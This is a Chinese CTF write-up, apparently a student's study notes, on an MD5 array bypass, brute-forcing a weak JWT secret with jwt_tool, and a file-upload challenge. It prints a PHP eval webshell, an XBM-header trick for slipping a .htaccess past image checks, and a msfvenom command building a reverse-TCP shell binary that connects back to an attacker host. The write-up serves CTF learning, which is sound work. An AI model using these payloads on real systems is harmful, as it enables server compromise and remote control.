依旧中译中,大佬说py代码会降低复现失败的概率
Ezmd5
值不能相等,但是md5值要强相等,数组绕过
弱相等的用0e绕过
1 | import requests |
admin
纯爆破,我怎么知道刚好有有四个字符,还刚好是小写
题目描述说“不小心把管理员的账号给删了”,我理解成把管理员账号从数据库中删了,所以就没往爆破方向想了
1 | import itertools #生成爆破字典都用它 |
1 | F:\cry\jwt_tool-2.3.0>python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoidXNlciIsImlhdCI6MTc3MDQzMDAzNCwiZXhwIjoxNzcwNDMzNjM0fQ.XQU09R7Znhp-S0TUZqLguZAtDwsK1Jz5Zarkk_rrbLo -C -d 4字符小写.txt |
-C 全称 --crack,表示启动 JWT 签名密钥的爆破模式
-d 全称 --dictionary,表示 “指定爆破使用的字典文件”,后面必须跟字典文件的路径 / 名称。
1 | Original JWT: |
发现不能发给repeater,因为中间还要通过一层vaildata.php鉴权,里面的post包里面就是要校验的token值,直接repeater发包返回“Failed to fetch”,就是跨域问题:前端页面和后端接口的域名 / 端口不一致,浏览器的跨域策略阻止了请求。
这题我用bp改get请求包一直失败,中间层还是原来的token值,但是浏览器直接改就会成功
所以写脚本
写脚本发现和repeater一样的效果
1 | import requests |
回显
1 | <body> |
所以我前面repeater的理解不全,catch error触发的条件是我后端接口地址错误,是validata.php不是index/home;response.json()解析失败
问了ai说这时候要直接伪造validata的请求包
1 | import requests |
SSO Drive
又是卡到写马环节,补充知识短标签
1 | <? @eval($_POST['a']);?> |
试试昨天的重写htaccess
发现不行,被过滤了
查看过滤回显,第一层是“only images and config files allowed”说明要上传图片+htaccess
上传一个只改文件后缀为jpg和htaccess时又回显“the file is not a vaild image data”
但是上传一个真正图片后面凭借代码时又上传成功了,说明后端校验图片头
说明要加个图片头绕过
但是apache在解析到GIF89a时发现列表里面没有指令,抛出错误,终止解析
补充知识xbm图片头绕过
1 | #define width 1 # XBM图片格式的标准开头,且以#开头,被Apache当作注释忽略 |
成功蚁剑连接后发现flag文件里面没有半截flag,也没有start.sh,不会又要复现失败了吧
wp用msf写了一个反弹shell的马
1 | sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f elf -o shell.elf |
msfvenom:Metasploit 框架的载荷生成工具,是msfpayload和msfencode的整合版,用于生成各种恶意载荷
-p(payload)指定要生成的载荷类型:
linux:目标系统为 Linux
x64:目标系统是 64 位架构
shell_reverse_tcp:反向 TCP Shell(核心功能),即让目标机器主动连接你的攻击机,建立交互式 Shell
LHOST=ip:指定kali IP 地址(需要替换成实际 IP),靶场会向这个 IP 发起反向连接
LPORT=port指定kali监听端口(需要替换成实际端口,如 4444),靶场会连接这个端口
-f elf :-f(format)指定输出文件格式为elf,这是 Linux 系统可执行文件的标准格式
-o shell.elf``-o(output)指定生成的文件保存为shell.elf,这是最终生成的恶意程序文件名
1 | [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload |
保存成功
反弹shell这一步又卡住了,如何上传shell.elf到题目里啊,我试了直接上传不行,改后缀名和mime格式后就解析成字符串了


题目链接https://furryctf.com/games/2/challenges#149-SSO-Drive,wp链接https://dcntycecetdh.feishu.cn/wiki/W3m8wlCy4iDIqJkgCgjcGMzmnee
如有错误,多多指教